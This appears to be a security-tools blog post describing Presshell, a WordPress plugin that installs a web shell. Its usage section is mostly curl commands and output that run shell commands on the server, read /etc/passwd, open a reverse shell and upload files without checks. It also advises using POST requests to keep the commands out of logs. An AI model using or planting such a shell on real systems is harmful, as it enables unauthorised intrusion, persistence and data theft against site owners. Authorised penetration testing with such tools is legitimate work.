Kali Linux

Presshell : Quick And Dirty WordPress Command Execution Shell

Presshell is a tool for Quick & dirty WordPress Command Execution Shell. Execute shell commands on your wordpress server. Uploaded shell will probably be at <your-host>/wp-content/plugins/shell/shell.php

Installation

To install the shell, we are assuming you have administrative rights to WordPress and can install plugins since transferring a PHP file to the media library shouldn’t work anyway. Otherwise, you have a bigger problem.

Simply upload the zip file located in the Releases section as a new extension and you’re good to go.

Usage

Using the shell is straightforward. Simply pass sh commands as an argument to the shell :

❯ curl ‘http://host/…/shell.php?cmd=uname+-a’
Linux wordpress-server 2.6.32-21-generic-pae #
32-Ubuntu SMP Fri Apr 16 09:39:35 UTC 2010 i686 GNU/Linux

You may as well pass these arguments in a POST request, which is the recommended way to keep your commands out of logs.

❯ curl ‘http://host/…/shell.php’ –data-urlencode ‘cmd=ls’
LICENSE
README.md
shell.php

More complex commands are also supported, careful about your quoting though

❯ curl ‘http://host/…/shell.php’ –data-urlencode ‘cmd=cat /etc/passwd | grep -v “(false|nologin)”‘
root:x:0:0:root:/root:/bin/bash
sync:x:4:65534:sync:/bin:/bin/sync

❯ curl ‘http://host/…/shell.php’ –data-urlencode ‘cmd=python -c “from urllib.parse import urlencode; print(urlencode({\”cmd\”: \”uname -a\”}))”‘
cmd=uname+-a

You can also open a reverse shell using the ip and port parameters. The default port is 443.

❯ curl ‘http://host/…/shell.php’ –data-urlencode ‘ip=127.0.0.1’

❯ curl ‘http://host/…/shell.php’ –data-urlencode ‘ip=127.0.0.1’ –data-urlencode ‘port=1337’

There is also an option provided for convenience to upload a file to the directory of the plugin unconditionally and without checks.

❯ curl ‘http://host/…/shell.php’ -F ‘file=@some_file’
❯ curl ‘http://host/…/shell.php’ –data-urlencode ‘cmd=ls’
LICENSE
README.md
shell.php
some_file

R K

Recent Posts

Kali Linux 2024.4 Released, What’s New?

Kali Linux 2024.4, the final release of 2024, brings a wide range of updates and…

8 hours ago

Lifetime-Amsi-EtwPatch : Disabling PowerShell’s AMSI And ETW Protections

This Go program applies a lifetime patch to PowerShell to disable ETW (Event Tracing for…

8 hours ago

GPOHunter – Active Directory Group Policy Security Analyzer

GPOHunter is a comprehensive tool designed to analyze and identify security misconfigurations in Active Directory…

2 days ago

2024 MITRE ATT&CK Evaluation Results – Cynet Became a Leader With 100% Detection & Protection

Across small-to-medium enterprises (SMEs) and managed service providers (MSPs), the top priority for cybersecurity leaders…

5 days ago

SecHub : Streamlining Security Across Software Development Lifecycles

The free and open-source security platform SecHub, provides a central API to test software with…

1 week ago

Hawker : The Comprehensive OSINT Toolkit For Cybersecurity Professionals

Don't worry if there are any bugs in the tool, we will try to fix…

1 week ago